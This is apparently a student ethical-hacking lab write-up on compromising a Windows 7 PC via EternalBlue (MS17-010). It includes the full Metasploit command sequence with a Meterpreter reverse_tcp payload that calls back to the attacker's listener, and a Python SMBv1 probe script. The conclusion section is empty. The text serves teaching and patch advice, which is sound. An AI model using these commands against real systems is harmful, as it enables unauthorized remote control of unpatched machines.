
Ethical Hacking Assignment 1

Hack Windows 7 PC using EternalBlue

Abstract

Ethical hacking is an authorized attempt to gain access to a computer system,
application, or data in the way a real attacker would. Here I am hacking a
Windows 7 PC using the EternalBlue exploit. Carrying out an ethical hack involves
duplicating the strategies and actions of malicious attackers. This practice helps
to identify security vulnerabilities, which can then be resolved before a malicious
attacker has the opportunity to exploit them.

Introduction

Here we are hacking a Windows 7 PC using the EternalBlue exploit, so we need a
target machine running Windows 7 and an attacking machine running Kali Linux
with Metasploit installed. Metasploit is an open-source penetration testing
framework, originally written by H.D. Moore and maintained by Rapid7 since 2009.
It is one of the world's most widely used penetration testing frameworks and
ships with a large collection of exploit modules, auxiliary scanners and payloads
for attacking vulnerabilities in network services and operating systems.

An exploit is a program, or piece of code, designed to take advantage of a
security flaw or vulnerability in an application or computer system, typically to
run attacker-controlled code or install malware. An exploit is not malware itself;
it is the method used to deliver it. EternalBlue is the exploit we use in this
operation.

EternalBlue is an exploit that allows cyber threat actors to remotely execute
arbitrary code and gain access to a network by sending specially crafted packets
to the SMB service on TCP port 445. It exploits a software vulnerability in the
Server Message Block version 1 (SMBv1) implementation of Microsoft's Windows
operating systems. SMB is a network file sharing protocol that allows access to
files on a remote server.

Background

Microsoft introduced Windows 7 in 2009 and ended mainstream support for it in
January 2015, the same year Windows 10 was launched.

From then on Windows 7 received only security updates under extended support,
and those officially ended on January 14, 2020.

But there are still many users on Windows 7. Hundreds of millions of machines are
affected: at the end of support Windows 7 still ran on roughly a quarter of
desktop PCs, according to NetMarketShare.

EternalBlue is an exploit most likely developed by the NSA as a zero-day. It was
released in April 2017 by the Shadow Brokers, a hacker group known for leaking
tools and exploits used by the Equation Group, which has possible ties to the
Tailored Access Operations unit of the NSA. Microsoft had patched the underlying
vulnerability a month earlier, on March 14, 2017, in security bulletin MS17-010,
and in May 2017 the WannaCry ransomware worm used EternalBlue to spread across
unpatched networks worldwide.

EternalBlue targets CVE-2017-0144, a vulnerability in the SMBv1 server driver
(srv.sys) of Windows that was fixed by the MS17-010 update; the two names are
often used interchangeably, but EternalBlue is the exploit and MS17-010 is the
patch. SMB allows systems to share access to files, printers, and other resources
on the network. The attack needs no credentials because SMBv1 lets an anonymous
client establish a null session. Over that session the attacker sends specially
crafted SMBv1 transaction requests whose extended-attribute (FEA) list the server
mis-sizes (a DWORD length is truncated to a WORD), which overflows a kernel pool
buffer. The exploit turns that memory corruption into arbitrary code execution in
the kernel, so the payload runs as SYSTEM.

Methodology

The first thing we need to do is open up the terminal and start Metasploit. Type
service postgresql start to initialize the PostgreSQL database, if it is not running
already, followed by msfconsole.

Next, use the search command within Metasploit to locate a suitable module to
use, for example search ms17_010.

There is an auxiliary scanner, auxiliary/scanner/smb/smb_ms17_010, that we can
run to determine whether a target is vulnerable to MS17-010. It connects
anonymously, opens the IPC$ share and sends a PeekNamedPipe request; an
unpatched host answers with STATUS_INSUFF_SERVER_RESOURCES, while a patched
host answers with STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE. It's always a
good idea to perform recon like this first. Otherwise, you could end up wasting a
lot of time if the target isn't even vulnerable, and because EternalBlue corrupts
kernel memory, an attempt against the wrong target can crash it.

Once we have determined that our target is indeed vulnerable to EternalBlue, we
can use the following exploit module from the search we just did.

use exploit/windows/smb/ms17_010_eternalblue

You'll know you're good if you see the
"exploit(windows/smb/ms17_010_eternalblue)" prompt.

We can take a look at the current settings with the options command.

First, we need to specify the IP address of the target.

set rhosts <target ip address>

Next, we load the Meterpreter reverse_tcp payload. The x64 payload matches a
64-bit Windows 7 install; check the target's architecture against the module's
targets before choosing it.

set payload windows/x64/meterpreter/reverse_tcp

Then set the listening host to the IP address of our Kali machine. The payload
connects back to this address, so it must be reachable from the target.

set lhost <host ip address>

And the listening port to a suitable number, i.e. any free port on the Kali
machine that the target is allowed to reach.

set lport 4321

That should be everything, so the only thing left to do is launch the exploit. Use
the run command (an alias for exploit) to fire it off.

run

We see a few things happen here, like the SMB connection being established, the
kernel pool being groomed and the exploit packet being sent. At last, we see a
"WIN" banner and a Meterpreter session is opened. Sometimes this exploit will not
complete successfully the first time, so if it doesn't, just try again and it
should go through. Bear in mind that a failed attempt still corrupts kernel memory
on the target and can crash it with a blue screen, which is another reason to
confirm the vulnerability with the scanner first.

We can verify we have compromised the target by running Meterpreter commands in
the new session, such as sysinfo to obtain operating system information and
getuid to get the current username. Because the payload is launched from kernel
context, getuid reports NT AUTHORITY\SYSTEM, the highest local privilege level,
with no separate privilege escalation step.
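Before any of the above, a practitioner wants a cheap check that the target even speaks SMBv1, since a host with SMBv1 disabled cannot be hit by MS17-010 at all. The script below is an added example written for this write-up; it is not Metasploit code and not part of the original assignment. It hand-builds the SMB_COM_NEGOTIATE request (the first message of every SMBv1 session), parses the server's reply, and reports which dialect the server chose and whether SMB signing is enabled or required. The target address, the sample reply bytes and the function names are assumptions made for the example.

```python
"""Probe whether a host still accepts SMBv1, the protocol EternalBlue abuses.

Added example, not Metasploit code. Sends one SMB_COM_NEGOTIATE request and
decodes the reply. A host that accepts "NT LM 0.12" is worth running the
MS17-010 scanner against; a host that resets the connection has SMBv1 off.
"""
import socket
import struct

SMB_COM_NEGOTIATE = 0x72
SMB_HEADER = "<4sBIBHH8sHHHHH"   # 32-byte SMB1 header, little-endian fields
DIALECTS = (b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12")


def build_negotiate_request(dialects=DIALECTS, pid=0x1234, mid=1):
    """Return a NetBIOS-framed SMB_COM_NEGOTIATE request offering `dialects`."""
    header = struct.pack(
        SMB_HEADER,
        b"\xffSMB", SMB_COM_NEGOTIATE,
        0,              # NT status (unused in a request)
        0x18,           # Flags: canonical, case-insensitive paths
        0x0001,         # Flags2: long names; no Unicode / extended-security bits
        0,              # PIDHigh
        b"\x00" * 8,    # SecurityFeatures (signature), zero before signing starts
        0, 0, pid, 0, mid,  # Reserved, TID, PIDLow, UID, MID
    )
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)  # dialect strings
    body = struct.pack("<BH", 0, len(data)) + data            # WordCount=0, ByteCount
    smb = header + body
    # NetBIOS session service header: type 0x00 followed by a 24-bit length
    return struct.pack(">I", len(smb)) + smb


def parse_negotiate_response(raw, dialects=DIALECTS):
    """Decode the server's SMB_COM_NEGOTIATE reply (NetBIOS frame included)."""
    smb = raw[4:]
    if len(smb) < 33 or smb[:4] != b"\xffSMB":
        raise ValueError("not an SMB1 response")
    cmd, status = struct.unpack_from("<BI", smb, 4)
    if cmd != SMB_COM_NEGOTIATE or status != 0:
        raise ValueError("negotiate failed: command=%#x status=%#x" % (cmd, status))
    word_count = smb[32]
    words = smb[33:33 + 2 * word_count]
    dialect_index = struct.unpack_from("<H", words, 0)[0]
    if dialect_index == 0xFFFF:
        return {"smb1": True, "dialect": None}   # speaks SMB1 but rejected every offer
    result = {"smb1": True, "dialect": dialects[dialect_index].decode()}
    if word_count == 17:   # NT LM 0.12 layout: DialectIndex(2), SecurityMode(1), ...
        security_mode = words[2]
        result["signing_enabled"] = bool(security_mode & 0x04)
        result["signing_required"] = bool(security_mode & 0x08)
    return result


def probe_smb1(host, port=445, timeout=5.0):
    """Connect to host:port, negotiate, and return the parsed result (or smb1=False)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_negotiate_request())
            raw = s.recv(4096)
    except OSError as exc:   # SMBv1-disabled hosts reset the connection or stay silent
        return {"smb1": False, "reason": str(exc)}
    if not raw:
        return {"smb1": False, "reason": "connection closed"}
    return parse_negotiate_response(raw)


def sample_negotiate_response(dialect_index=2, security_mode=0x03, word_count=17):
    """Constructed reply bytes for offline testing; not a real capture."""
    header = struct.pack(SMB_HEADER, b"\xffSMB", SMB_COM_NEGOTIATE, 0,
                         0x98,    # Flags: reply bit set
                         0xC001, 0, b"\x00" * 8, 0, 0, 0x1234, 0, 1)
    words = struct.pack("<H", dialect_index)
    if word_count == 17:
        words += bytes([security_mode])
    words = words.ljust(2 * word_count, b"\x00")
    smb = header + bytes([word_count]) + words + struct.pack("<H", 0)  # ByteCount=0
    return struct.pack(">I", len(smb)) + smb


# Windows 7 workstation style reply: picks "NT LM 0.12", SecurityMode 0x03
# (user-level security, challenge/response passwords, signing neither enabled
# nor required). Constructed for the example.
SAMPLE_WIN7_RESPONSE = sample_negotiate_response()
SAMPLE_NO_DIALECT_RESPONSE = sample_negotiate_response(dialect_index=0xFFFF, word_count=1)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.0.10"  # lab target from this write-up
    print(probe_smb1(target))
```

Run it as python3 smb1_probe.py 10.10.0.10 from Kali before starting msfconsole. A result with "smb1": False means EternalBlue is not applicable and the module would only waste time or crash the host; a result naming "NT LM 0.12" means the next step is the Metasploit MS17-010 scanner, which performs the deeper PeekNamedPipe check that this negotiate-only probe deliberately stops short of.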

Implementation

We use the Kali Linux terminal to run the following commands against the
Windows 7 target.

The commands are (the first two in the shell, the next eight inside msfconsole,
and the last two inside the Meterpreter session that opens after run):

service postgresql start
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
options
set rhosts 10.10.0.10
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.0.1
set lport 4321
run
sysinfo
getuid

Result

The Windows 7 PC was successfully compromised. A Meterpreter shell running as
SYSTEM is accessible from Kali Linux, and from it we could run multiple commands
and programs on the target, using nothing but the EternalBlue exploit.

Findings

An unpatched Windows 7 PC with SMBv1 reachable on TCP port 445 can be fully
compromised with these techniques, without credentials and without any user
interaction. The fix is to apply the MS17-010 update (or retire Windows 7, which
no longer receives updates), disable SMBv1 altogether, and block port 445 at
network boundaries so the service is never exposed to untrusted networks.


Conclusion and future work

